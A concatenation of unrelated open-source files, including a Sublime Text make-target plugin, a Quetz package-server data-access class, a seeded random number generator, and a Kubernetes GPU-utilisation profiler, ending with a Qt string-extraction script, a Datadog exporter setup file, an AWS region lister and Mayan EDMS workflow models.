self.window.run_command('quick_panel', panel_args)
def regen_targets(self, makefile=None):
self.need_regen = False
self._targets = None
self.build.set('makefile', makefile if makefile else self.makefile)
self.build.set('variants', [dict(name=target, make_target=target) for target in self.targets])
sublime.save_settings('MakeTargets.sublime-build')
def run(self, **args):
if args.get('kill'):
self.window.run_command('exec', dict(
kill=True
))
return
if args.get('regen', False):
self.regen_targets(args.get('makefile', None))
return
if self.need_regen or (self.targets and not self.build.get('variants', None) or (self.makefile != self.build.get('makefile', None))):
self.regen_targets()
self.show_panel()
return
if args.get('palette', False):
self.show_panel()
return
target = args.get('make_target', '')
if target == '<<no target>>':
target = ''
self.build_now(target, args)
# override
def on_show_last_change(self):
if not Settings().get('show_last_cmd_status_bar', False):
self.window.active_view().erase_status('mt_last_target')
# override
def on_ignore_prefixes_change(self):
self.need_regen = True
# override
def on_target_regex_change(self):
self.target_regex = re.compile(Settings().get('target_regex', TARGET_REGEX))
# override
def on_hide_dup_targets_change(self):
self.hide_dups = Settings().get('hide_dup_targets', False)
# override
def on_phony_name_change(self):
self.phony = self.load_phony()
self.need_regen = True
# override
def on_sort_targets_change(self):
self.sort_targets = Settings().get('sort_targets', False)
self.need_regen = True
# override
def on_job_number_change(self):
self.job_num = Settings().get('job_number', None)
class MakeTargetsEventListener(sublime_plugin.EventListener):
def __init__(self):
sublime_plugin.EventListener.__init__(self)
settings = Settings()
settings.add_on_change('regen_on_save', self.on_regen_on_save_change)
self.regen_on_save = settings.get('regen_on_save', False)
# override
def on_regen_on_save_change(self):
self.regen_on_save = Settings().get('regen_on_save', False)
def on_post_save_async(self, view):
if self.regen_on_save and view.file_name().endswith('Makefile'):
view.window().run_command('make_targets', {'regen': True, 'makefile': view.file_name()})
|
the-stack_106_23365 | # Copyright 2020 QuantStack
# Distributed under the terms of the Modified BSD License.
from sqlalchemy.orm import Session, joinedload, aliased
from .db_models import Profile, User, Channel, ChannelMember, Package, PackageMember, ApiKey, \
PackageVersion
from quetz import rest_models
import uuid
class Dao:
def __init__(self, db: Session):
self.db = db
def rollback(self):
self.db.rollback()
def get_profile(self, user_id):
return self.db.query(Profile).filter(Profile.user_id == user_id).one()
def get_user(self, user_id):
return self.db.query(User).filter(User.id == user_id).one()
def get_users(self, skip: int, limit: int, q: str):
query = self.db.query(User) \
.filter(User.username.isnot(None))
if q:
query = query.filter(User.username.ilike(f'%{q}%'))
return query \
.options(joinedload(User.profile)) \
.offset(skip) \
.limit(limit) \
.all()
def get_user_by_username(self, username: str):
return self.db.query(User) \
.filter(User.username == username) \
.options(joinedload(User.profile)) \
.one_or_none()
def get_channels(self, skip: int, limit: int, q: str):
query = self.db.query(Channel)
if q:
query = query.filter(Channel.name.ilike(f'%{q}%'))
return query \
.offset(skip) \
.limit(limit) \
.all()
def create_channel(self, data: rest_models.Channel, user_id: bytes, role: str):
channel = Channel(
name=data.name,
description=data.description)
member = ChannelMember(
channel=channel,
user_id=user_id, role=role)
self.db.add(channel)
self.db.add(member)
self.db.commit()
def get_packages(self, channel_name: str, skip: int, limit: int, q: str):
query = self.db.query(Package) \
.filter(Package.channel_name == channel_name)
if q:
query = query.filter(Package.name.like(f'%{q}%'))
return query \
.offset(skip) \
.limit(limit) \
.all()
def get_channel(self, channel_name: str):
return self.db.query(Channel) \
.filter(Channel.name == channel_name).one_or_none()
def get_package(self, channel_name: str, package_name: str):
return self.db.query(Package).join(Channel) \
.filter(Channel.name == channel_name) \
.filter(Package.name == package_name) \
.one_or_none()
def create_package(self, channel_name: str, new_package: rest_models.Package, user_id: bytes,
role: str):
package = Package(
name=new_package.name,
description=new_package.description)
package.channel = self.db.query(Channel) \
.filter(Channel.name == channel_name) \
.one()
member = PackageMember(
channel=package.channel,
package=package,
user_id=user_id, role=role)
self.db.add(package)
self.db.add(member)
self.db.commit()
def get_channel_members(self, channel_name: str):
return self.db.query(ChannelMember).join(User) \
.filter(ChannelMember.channel_name == channel_name) \
.all()
def get_channel_member(self, channel_name, username):
return self.db.query(ChannelMember).join(User) \
.filter(ChannelMember.channel_name == channel_name) \
.filter(User.username == username) \
.one_or_none()
def create_channel_member(self, channel_name, new_member):
user = self.get_user_by_username(new_member.username)
member = ChannelMember(
channel_name=channel_name,
user_id=user.id,
role=new_member.role)
self.db.add(member)
self.db.commit()
def get_package_members(self, channel_name, package_name):
return self.db.query(PackageMember).join(User) \
.filter(User.username.isnot(None)) \
.filter(PackageMember.channel_name == channel_name) \
.filter(PackageMember.package_name == package_name) \
.all()
def get_package_member(self, channel_name, package_name, username):
return self.db.query(PackageMember).join(User) \
.filter(PackageMember.channel_name == channel_name) \
.filter(PackageMember.package_name == package_name) \
.filter(User.username == username) \
.one_or_none()
def create_package_member(self, channel_name, package_name, new_member):
user = self.get_user_by_username(new_member.username)
member = PackageMember(
channel_name=channel_name,
package_name=package_name,
user_id=user.id,
role=new_member.role)
self.db.add(member)
self.db.commit()
def get_package_api_keys(self, user_id):
return self.db.query(PackageMember, ApiKey) \
.join(User, PackageMember.user_id == User.id) \
.join(ApiKey, ApiKey.user_id == User.id) \
.filter(ApiKey.owner_id == user_id) \
.all()
def get_channel_api_keys(self, user_id):
return self.db.query(ChannelMember, ApiKey) \
.join(User, ChannelMember.user_id == User.id) \
.join(ApiKey, ApiKey.user_id == User.id) \
.filter(ApiKey.owner_id == user_id) \
.all()
def create_api_key(self, user_id, api_key: rest_models.BaseApiKey, key):
user = User(id=uuid.uuid4().bytes)
owner = self.get_user(user_id)
db_api_key = ApiKey(
key=key,
description=api_key.description,
user=user,
owner=owner
)
self.db.add(db_api_key)
for role in api_key.roles:
if role.package:
package_member = PackageMember(
user=user,
channel_name=role.channel,
package_name=role.package,
role=role.role)
self.db.add(package_member)
else:
channel_member = ChannelMember(
user=user,
channel_name=role.channel,
role=role.role)
self.db.add(channel_member)
self.db.commit()
def create_version(self, channel_name, package_name, platform, version, build_number, build_string, filename, info,
uploader_id):
version = PackageVersion(
id=uuid.uuid4().bytes,
channel_name=channel_name,
package_name=package_name,
platform=platform,
version=version,
build_number=build_number,
build_string=build_string,
filename=filename,
info=info,
uploader_id=uploader_id
)
self.db.add(version)
self.db.commit()
def get_package_versions(self, package):
ApiKeyProfile = aliased(Profile)
return self.db.query(PackageVersion, Profile, ApiKeyProfile) \
.outerjoin(Profile, Profile.user_id == PackageVersion.uploader_id) \
.outerjoin(ApiKey, ApiKey.user_id == PackageVersion.uploader_id) \
.outerjoin(ApiKeyProfile, ApiKey.owner_id == ApiKeyProfile.user_id) \
.filter(PackageVersion.channel_name == package.channel_name) \
.filter(PackageVersion.package_name == package.name) \
.all()
|
the-stack_106_23366 | import numpy as np
import logging
class MyRand(object):
'''
Class that provides the function random() which returns a 'random number'
in the open(!) interval (0,1). The class has been created for TESTING and
DEVELOPMENT purposes and PRODUCES THE SAME SEQUENCE of 'random numbers'
for a given seed < 0 (as long as no multiple threads are running).
This also works 'cross-language' with the Fortran implementation.
'''
idum = -4242
iv = None
iy = None
def __init__(self, seed=None):
self.logger = logging.getLogger(f'{__name__}.{__class__.__name__}')
self.idum = self.__class__.idum if seed==None else seed
self.iv = self.__class__.iv
self.iy = self.__class__.iy
self.logger.debug(f'Random number seed: {self.idum}')
def ran1(self):
'''
From Numerical Recipes in F77, 2nd. Edition, corresponds to ran1.
Adapted to double precision (Python float).
“Minimal” random number generator of Park and Miller with Bays-Durham
shuffle and added safeguards. Returns a uniform random deviate between
0.0 and 1.0 (exclusive of the endpoint values). Call with self.idum a
negative integer to initialize; thereafter, do not alter idum between
successive deviates in a sequence. RNMX should approximate the largest
floating value that is less than 1.
Returns
-------
float
Next 'random number' in the sequence.
'''
# INTEGER idum,IA,IM,IQ,IR,NTAB,NDIV
# REAL ran1,AM,EPS,RNMX
# IA=16807,IM=2147483647,AM=1./IM,IQ=127773,IR=2836
# NTAB=32,NDIV=1+(IM-1)/NTAB,EPS=1.2e-7,RNMX=1.-EPS
IA=16807
IM=2147483647
# AM=np.float32(1./IM)
AM=1/IM
IQ=127773
IR=2836
NTAB=32
NDIV=1+int((IM-1)/NTAB)
# EPS=np.float32(1.2e-7)
# RNMX=np.float32(1.-EPS)
EPS=1.2e-7
RNMX=1.-EPS
RNMX = 1-2.23e-16 # 2.23d-16 is approx. np.finfo(float).eps
# INTEGER j,k,iv(NTAB),iy
# SAVE iv,iy
# DATA iv /NTAB*0/, iy /0/
if self.iv is None:
self.iv = np.int_([0]*NTAB)
if self.iy is None:
self.iy = 0
if self.idum <= 0 or self.iy == 0:
self.idum=max(-self.idum,1)
# do 11 j=NTAB+8,1,-1
for j in range(NTAB+8,0,-1):
# self.logger.debug(f'\t1 ran1.idum={ran1.idum}')
k = self.idum // IQ
self.idum = IA*(self.idum-k*IQ)-IR*k
if self.idum < 0:
self.idum += IM
if j <= NTAB:
self.iv[j-1] = self.idum
self.iy = self.iv[0]
# self.logger.debug(f'\t2 ran1.idum={ran1.idum}')
k = self.idum // IQ
self.idum = IA*(self.idum-k*IQ)-IR*k
if self.idum < 0:
self.idum += IM
# self.logger.debug(f'\t3 ran1.iy={ran1.iy}')
j = 1 + self.iy // NDIV
self.iy = self.iv[j-1]
self.iv[j-1] = self.idum
return min(AM*self.iy,RNMX)
|
the-stack_106_23368 | from prometheus_api_client import PrometheusConnect, MetricsList
from prometheus_api_client.utils import parse_datetime
import pandas as pd
import os
import time
import logging
from kubernetes import config, client
from scipy.stats import norm
import numpy as np
import subprocess
import copy
from pynvml import *
import math
import ast
MEM_UTIL = "DCGM_FI_DEV_MEM_COPY_UTIL"
GPU_UTIL = "DCGM_FI_DEV_GPU_UTIL"
DOMAIN = "ai.centaurus.io"
def cyclic_pattern_detection(time_series):
"""input pandas series, detect cyclic pattern return True/False
if True, return frequency, if false, frequency is -1
"""
# calculate autocorrelation
auto_corr = [time_series.autocorr(lag=i) for i in range(int(len(time_series)/2))]
# assume auto_corr value is normal distribution, based on 95% confidence interval, calculate the line for signifence
critical = norm.ppf(1-0.05/2, loc=np.mean(auto_corr), scale=np.std(auto_corr))
peak_lag = []
# select the peak of correlation coefficients
for i, v in enumerate(auto_corr):
if v > critical: # if auto corr value > critical value, consider the correlation is significant
peak_lag.append(i)
if len(peak_lag) > 2: # repetitive significant peaks as the rule for cyclic patterns
lag_diff = pd.Series(peak_lag).diff() # to calculate period
period = lag_diff.median()
return True, period
else:
return False, -1
def add_pod_info_to_crd(api, crd_api, pod_name, namespace, ann, node_name):
"""1)get pod's owner by ownereference, 2)patch pod info to owner's annotation for persistent record,
sinces pods often got deleted after *job is done
assume owner is crd, not native k8s object for now, since different api group will be used
save the max utilization only for now, only patch if current util is greater than the existing annotations
"""
# 1) get owner reference
owner_kind, owner_name, owner_group, owner_version = "","","",""
try:
ret = api.list_namespaced_pod(namespace)
for i in ret.items:
if i.metadata.name == pod_name:
ref = i.metadata.owner_references
# get the first owner and print kind and name
if ref is not None and len(ref) > 0:
owner_kind = ref[0].kind.lower()
owner_name = ref[0].name.lower()
owner_group, owner_version = ref[0].api_version.lower().split("/")
break
except Exception as e:
logging.error(e)
return False
if owner_name=="" or owner_kind=="" or owner_group=="" or owner_version=="":
logging.warning("In {} namespace pod {}'s owner reference is not set, add no annotations to owner".format(namespace, pod_name))
return False
# 2) get owner's current annonation, update if greater utilization is found
try:
res = crd_api.get_namespaced_custom_object(owner_group,owner_version,namespace,
plural=owner_kind+'s',name=owner_name)
except Exception as e:
logging.error("Error: no kind: {} named {}".format(owner_kind, owner_name))
return False
# ann example ai.centaurus.io/pod_name:{mem_max:XXX,cpu_max:XXX}
key = DOMAIN + "/" + pod_name
need_patch = True
pod_ann = dict()
if key in res['metadata']['annotations']: # iteration and compare,
need_patch = False
pod_ann = ast.literal_eval(res['metadata']['annotations'][key]) # convert string to dictionary
for k, v in pod_ann.items():
domain_k = DOMAIN + "/" + k # the key in owner's annotation has no domain name
if k == "node": # skip the node comparison
continue
if float(v) < ann[domain_k]: # detect greater utilization, update
pod_ann[k] = ann[domain_k]
need_patch = True
else: # simply remove the domain name from new ann
pod_ann = ann
ann['node'] = node_name
# patch the info
if need_patch:
crd_ann = dict()
crd_ann[key] = str(pod_ann).replace(DOMAIN+"/","")
body = {'metadata':{'annotations':crd_ann}}
res = crd_api.patch_namespaced_custom_object(owner_group,owner_version,namespace,
plural=owner_kind+'s',name=owner_name,body=body)
logging.info("patch crd utilization done {}: {}".format(owner_name,res['metadata']['annotations'][key]))
return True
def patch_annotation(api, name, ann, namespace="", node_name="", crd_api=None):
"""check if object exists first"""
ann2 = copy.deepcopy(ann) # copy and then make changes
# reformat dictionary, in case it is nested, flatten to one level by cast nested dict to string
for k, v in ann2.items():
if v is not None: # if v is None, it means delete the existing annotaion
ann2[k]=str(v)
body = {'metadata': {'annotations':ann2}}
if namespace == "": # patch node
api.patch_node(name, body)
else: # patch pod, verify pod existence first
pod_exist = False
pods = api.list_namespaced_pod(namespace)
for i in pods.items:
if i.metadata.name == name:
pod_exist = True
break
if pod_exist:
api.patch_namespaced_pod(name, namespace, body)
# patch pod info to owner custom resources, assume owner is CRD for now, dont handle native object like, job, statefulSet ...
if crd_api is not None:
add_pod_info_to_crd(api, crd_api, name, namespace, ann, node_name)
return True
def collect_gpu_usage_nvml(gpu_idx):
cur_usage = dict()
try:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(gpu_idx)
except Exception as e:
logging.error(e)
return cur_usage
cur_usage['mem_used'] =str(math.ceil(nvmlDeviceGetMemoryInfo(handle).used/pow(1024,3))) + 'GB'
cur_usage['mem_free'] =str(math.ceil(nvmlDeviceGetMemoryInfo(handle).total/pow(1024,3)) - math.ceil(nvmlDeviceGetMemoryInfo(handle).used/pow(1024,3))) + 'GB'
processes = nvmlDeviceGetComputeRunningProcesses(handle)
cur_usage['process_cnt'] = len(processes)
if len(processes) > 0:
cur_usage['pid-mem'] = [(i.pid, str(math.ceil(i.usedGpuMemory/pow(1024,2)))+'MB') for i in processes]
#cur_usage['pid-mem-gutil'] =[(i.pid, i.usedGpuMemory) for i in processes]
return cur_usage
def remove_annotation(api, node_name, pod_name="", ns=""):
# 1) get pod name and namespace on the node, scan all the keys in annoations, if start with ai.centaurus.io, set to none
field_selector = 'spec.nodeName='+node_name
ret = api.list_pod_for_all_namespaces(watch=False, field_selector=field_selector)
for i in ret.items:
if pod_name != "" and (i.metadata.name != pod_name or i.metadata.namespace != ns):
continue
if i.metadata.annotations is not None:
ann_rm = dict()
for key in i.metadata.annotations:
if key.startswith("ai.centaurus.io"): # add the removal dict
ann_rm[key] = None
if len(ann_rm) > 0:
patch_annotation(api, i.metadata.name, ann_rm, i.metadata.namespace)
logging.info("Init reset pod {}'s annotation, remove {}".format(i.metadata.name,ann_rm.keys()))
def collect_pod_metrics(api, cur_usage, node_name, gpu_id, pods_ann):
"""
pods_ann: dict()
key: dlt-job:default #podname:namespace
value (annotations): {"ai.centaurusinfra.io/gpu-memused":[(0,137MB),(1,1125MB)]}, #tuple (gpu_id, memused)
"""
# 1) get pod name and namespace on the node
field_selector = 'spec.nodeName='+node_name
ret = api.list_pod_for_all_namespaces(watch=False, field_selector=field_selector)
pod_ns = dict()
for i in ret.items:
pod_ns[i.metadata.name] = i.metadata.namespace
# 2) get pod name by pid
bashCmd = ["nsenter", "--target", "XXX", "--uts", "hostname"]
for pid, mem_used in cur_usage['pid-mem']:
mem_used_float = float(mem_used[:-2])
bashCmd[2]=str(pid)
subp = subprocess.Popen(bashCmd, stdout=subprocess.PIPE)
output, error = subp.communicate()
if error is None:
pod_name = output.decode("utf-8").rstrip()
if pod_name in pod_ns:
# 3) format results to dict, key: "podname:namespace:gpu_id", value:"{DOMAIN + "/gpu-memused":memused}"
key = pod_name + ":" + pod_ns[pod_name]
# list format for gpu mem usage
#e.g. ai.centaurus.io/gpu-memused:[('0','12000MB'),('1','159MB')]
if key in pods_ann:
pods_ann[key][DOMAIN + "/" +node_name + "-gpu-" +str(gpu_id)+"_mem_mb"] = mem_used_float
pods_ann[key][DOMAIN + "/" +node_name + "-gpu-" +str(gpu_id)+"_util"] = cur_usage['max_gpu_util']
else:
value = {DOMAIN + "/" +node_name +"-gpu-" +str(gpu_id)+"_util":cur_usage['max_gpu_util'],
DOMAIN + "/" +node_name +"-gpu-" +str(gpu_id)+"_mem_mb":mem_used_float
}
pods_ann[key] = value
else:
logging.error("pod name {} is not in listed all pods,{}".format(pod_name, pod_ns.keys)) # there was a podname key="" incident, not reproduced
else:
logging.error("nsenter failed to acquire pod name,{}".format(error))
return pods_ann
def get_pod_resource_util(pod_name, ns, promi_connector, duration="30s"):
"""use query to get resource utilization"""
cpu_usage_value, memory_usage_value, network_usage_value, io_usage_value = 0,0,0,0
cpu_usage = promi_connector.custom_query(query="sum(rate(container_cpu_usage_seconds_total{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(cpu_usage) > 0:
cpu_usage_value = cpu_usage[0]["value"][1]
memory_usage = promi_connector.custom_query(query="sum(rate(container_memory_usage_bytes{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(memory_usage) > 0:
memory_usage_value = memory_usage[0]["value"][1]
network_usage = promi_connector.custom_query(query="sum(rate(container_network_transmit_bytes_total{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(network_usage) > 0:
network_usage_value = network_usage[0]["value"][1]
io_usage = promi_connector.custom_query(query="sum(rate(container_fs_write_seconds_total{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(io_usage) > 0:
io_usage_value = io_usage[0]["value"][1]
return cpu_usage_value, memory_usage_value, network_usage_value, io_usage_value
def profiling(api, url, pod_ip, node_name, ana_window='2m', metrics=MEM_UTIL):
"""if key exists, the value will be replaced,
add dynamic status
{ai.centaurus.io/gpu0:{cur_mem_used:4GB, max_gpu_util:60, max_mem_cpy_util:34, cyclic:True, process_cnt:1},
ai.centaurus.io/gpu1:{cur_mem_used:4GB, max_gpu_util:60, max_mem_cpy_util:34, cyclic:True, process_cnt:2, processes:[{pid:25678, cur_mem_used:3GB},{pid:67234, cur_mem_used:1GB}]}
}
"""
node_dict = dict()
pod_dict = dict()
promi = PrometheusConnect(url=url, disable_ssl=True)
# except connection error
try:
promi.check_prometheus_connection()
except Exception as e:
logging.error(e)
return node_dict, pod_dict # if connectioin fails, return empty dict
instance = pod_ip + ":9400" # tmp fixed
start_time = parse_datetime(ana_window)
end_time = parse_datetime("now")
my_label_config = {"instance": instance} # select current host metrics
metric_data = promi.get_metric_range_data(metric_name=metrics,
label_config=my_label_config,
start_time=start_time,
end_time=end_time)
# reorganize data to label_config and metric_values
metric_object_list = MetricsList(metric_data)
for item in metric_object_list: # iterate through all the gpus on the node
if 'gpu' not in item.label_config: # handle metric config info exception
continue
id = item.label_config['gpu'] # predefined key from dcgm (gpu index)
cur_usage = collect_gpu_usage_nvml(int(id)) # nvml access GPU usage
# ip = item.label_config['instance']
key = DOMAIN + "/gpu-" + id
# analyze mem util curve
ts = item.metric_values.iloc[:, 1] # metrics_values are two row df, 1st is timestamp, 2nd is value
cur_usage['cyclic_pattern'] = False
if ts.max() > 0:
cyclic, period = cyclic_pattern_detection(ts)
if cyclic:
cur_usage['cyclic_pattern'] = True
cur_usage['period'] = str(period)
cur_usage['max_mem_util'] = ts.max()
# add gpu id to query condition, query again get the max_gpu_util
my_label_config['gpu'] = id
gpu_util_data = promi.get_metric_range_data(metric_name=GPU_UTIL,
label_config=my_label_config,
start_time=start_time,
end_time=end_time)
gpu_util_list = MetricsList(gpu_util_data)
if len(gpu_util_list) != 1:
logging.error("gpu util data read error, expect len {}, not equal to 1".format(len(gpu_util_list)))
else:
gpu_util_ts = gpu_util_list[0].metric_values.iloc[:, 1]
cur_usage['max_gpu_util'] = gpu_util_ts.max()
# Important: flatten nested dictionary to string, otherwise error "cannot unmarshal string into Go value of type map[string]interface {}""
#node_dict[key] = str(cur_usage)
# move the string cast to patch_annotation function
node_dict[key] = cur_usage
if "process_cnt" in cur_usage and cur_usage['process_cnt'] > 0:
collect_pod_metrics(api, cur_usage, node_name, id, pod_dict) # a pod may use multiple GPUs, so the dictionary value is appended
# add cadvisor metrics to pod
for k, v in pod_dict.items():
pod_name, ns = k.split(":")
cpu, memory, network, io = get_pod_resource_util(pod_name,ns, promi) # the values are str type
# v[DOMAIN + '/cpu_util'] = str(round(float(cpu)*100,2)) + '%'
# v[DOMAIN + '/cpu_mem'] = str(round(float(memory)/1e6,2)) + 'MB'
# v[DOMAIN + '/network'] = str(round(float(network)/1e3,2)) + 'KBps'
# v[DOMAIN + '/disk_io'] = io
v[DOMAIN + '/cpu_util'] = round(float(cpu)*100,2) # unit percentage
v[DOMAIN + '/cpu_mem_mb'] = round(float(memory)/1e6,2) # unit MB
v[DOMAIN + '/network_mbps'] = round(float(network)/1e6,2) # unit MBps
v[DOMAIN + '/disk_io'] = round(float(io),2)
return node_dict, pod_dict
def load_env_var():
env_var = dict()
if 'KUBERNETES_PORT' not in os.environ:
logging.error("RUNNING cluster is not avaliable")
return env_var, True
if "PROMETHEUS_SERVICE_HOST" in os.environ and "PROMETHEUS_SERVICE_PORT" in os.environ:
# use service name instead of IP, to avoid IP changes during service restart
url = "http://prometheus:" + os.environ['PROMETHEUS_SERVICE_PORT']
env_var['url'] = url
else:
logging.error("PROMETHEUS_SERVICE_HOST cannot be found in environment variable, "
"Please make sure service is launched before profiler deployment")
return env_var, True
if "MY_POD_IP" in os.environ:
env_var['pod_ip'] = os.environ['MY_POD_IP']
else:
logging.error("MY_POD_IP cannot be found in environment variables, "
"Please check profiler deployment file to include it as env.")
return env_var, True
if "MY_HOST_IP" in os.environ:
env_var['host_ip'] = os.environ['MY_HOST_IP']
else:
logging.error("MY_HOST_IP cannot be found in environment variables, "
"Please check profiler deployment file to include it as env.")
return env_var, True
if "MY_NODE_NAME" in os.environ:
env_var['node_name'] = os.environ['MY_NODE_NAME']
else:
logging.error("MY_HOST_NAME cannot be found in environment variables, "
"Please check profiler deployment file to include it as env.")
return env_var, True
return env_var, False
def collect_gpu_attributes():
"""if key exists, the value will be replaced
{ai.centaurus.io/gpu-static:{count:2,
gpus:[{index:0, pcie_bus_id:0000:84:00.0, model:TITANX, mem_size: 12GB, pcie_gen_width:1X16},
{index:1, pcie_bus_id:0000:88:00.0, model:TITANX, mem_size: 12GB, pcie_gen_width:1X16}
]
}
}
"""
attributes = dict()
try:
nvmlInit()
except Exception as e:
logging.error(e)
return attributes, True
deviceCount = nvmlDeviceGetCount()
attributes['count']=str(deviceCount)
# only get gpu0's attributes, assume same GPU card on one server
try:
handle = nvmlDeviceGetHandleByIndex(0)
except Exception as e:
logging.error(e)
return attributes, True
attributes['model'] = nvmlDeviceGetName(handle).decode("utf-8")
attributes['mem_size'] = str(math.ceil(nvmlDeviceGetMemoryInfo(handle).total/pow(1024,3))) + 'GB'
attributes['pcie_gen_width'] = str(nvmlDeviceGetCurrPcieLinkGeneration(handle)) + 'x' + str(nvmlDeviceGetCurrPcieLinkWidth(handle))
key = DOMAIN + "/gpu-static"
annotation = {key:attributes}
return annotation, False
def app_top():
env_var, err = load_env_var()
if err:
logging.error("Not all environment variables are avaliable in the profiler pod")
exit(1)
# 0) load kubernetes configure
config.load_incluster_config()
core_api = client.CoreV1Api()
crd_api = client.CustomObjectsApi()
# 1) init stage, get gpu static attribute, remove pod annotation from previous run
gpu_attributes, err = collect_gpu_attributes()
while err:
logging.warning("NVML lib is not installed or No GPUs avaliable, or GPU lost, check back after 30 sec")
time.sleep(30)
gpu_attributes, err = collect_gpu_attributes()
patch_annotation(core_api, env_var['node_name'], gpu_attributes)
logging.info("Init add gpu static attributes \n{}".format(gpu_attributes))
# remove pod annotations from ai.centaurus.io,
remove_annotation(core_api, env_var['node_name'])
# 3) infinit loop to monitor resource utilization and annonates to node, pod, and crds
# keep current annotatations, if no changes, no patch sent
node_ann_cur = dict()
pods_ann_cur = dict()
while True:
# profiling, add gpu dynamic status
node_ann_new, pods_ann_new = profiling(core_api, env_var['url'], env_var['pod_ip'],env_var['node_name'])
# update node annotation if changes detected
if node_ann_new != node_ann_cur:
patch_annotation(core_api, env_var['node_name'], node_ann_new)
logging.info("Node change detected, update node's GPU utilization")
node_ann_cur = node_ann_new
# update pod annotation
if pods_ann_new != pods_ann_cur:
logging.info("Pod change deteacted, update pods GPU utilization")
for name_ns, values in pods_ann_new.items(): # iterate all the pods needs to be annotated
pod_name, namespace = name_ns.split(":")
patch_annotation(core_api, pod_name, values, namespace, env_var['node_name'], crd_api) # patch pod and patch owner crd
for name_ns, values in pods_ann_cur.items():
if name_ns not in pods_ann_new: # ended pods or processes
pod_name, namespace = name_ns.split(":")
logging.info("Remove pod {} annotation for finished process \n".format(pod_name))
remove_annotation(core_api,env_var['node_name'],pod_name, namespace)
pods_ann_cur = pods_ann_new
time.sleep(30)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s',level=logging.INFO)
app_top()
|
the-stack_106_23369 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/moselbitstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *moselbit_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("moselbit-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
|
the-stack_106_23371 | """
Datadog exporter
"""
from setuptools import find_packages, setup
dependencies = ['boto3', 'click', 'pytz', 'durations', 'tzlocal', 'datadog', 'requests', 'python-dateutil']
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='datadog-exporter',
version="0.6.5",
url='https://github.com/binxio/datadog-exporter',
license='Apache2',
author='Mark van Holsteijn',
author_email='[email protected]',
description='CLI for exporting datadog metrics',
long_description=long_description,
long_description_content_type='text/markdown',
package_dir={'': 'src'},
packages=find_packages(where='src'),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
setup_requires=[],
tests_require=dependencies + ['pytest', 'botostubs', 'pytest-runner', 'mypy', 'yapf', 'twine', 'pycodestyle' ],
test_suite='tests',
entry_points={
'console_scripts': [
'datadog-exporter = datadog_export.__main__:main'
],
},
classifiers=[
# As from http://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'Development Status :: 1 - Planning',
# 'Development Status :: 2 - Pre-Alpha',
'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
#'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: MacOS',
'Operating System :: Unix',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
the-stack_106_23372 | #!/bin/env python
import sys
import boto3
from botocore.exceptions import ClientError
# To get a list of the AWS regions we have access to:
ec2 = boto3.client('ec2')
aws_regions = ec2.describe_regions()
print ('\nRegions we have access to:\n')
for region in aws_regions['Regions']:
region_name = region['RegionName']
print (' ', region_name)
print ('')
|
the-stack_106_23373 | import json
import logging
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from mayan.apps.acls.models import AccessControlList
from mayan.apps.documents.models import Document
from ..managers import ValidWorkflowInstanceManager
from ..permissions import permission_workflow_instance_transition
from .workflow_models import Workflow
from .workflow_transition_models import (
WorkflowTransition, WorkflowTransitionField
)
__all__ = ('WorkflowInstance', 'WorkflowInstanceLogEntry')
logger = logging.getLogger(name=__name__)
class WorkflowInstance(models.Model):
workflow = models.ForeignKey(
on_delete=models.CASCADE, related_name='instances', to=Workflow,
verbose_name=_('Workflow')
)
document = models.ForeignKey(
on_delete=models.CASCADE, related_name='workflows', to=Document,
verbose_name=_('Document')
)
context = models.TextField(
blank=True, verbose_name=_('Context')
)
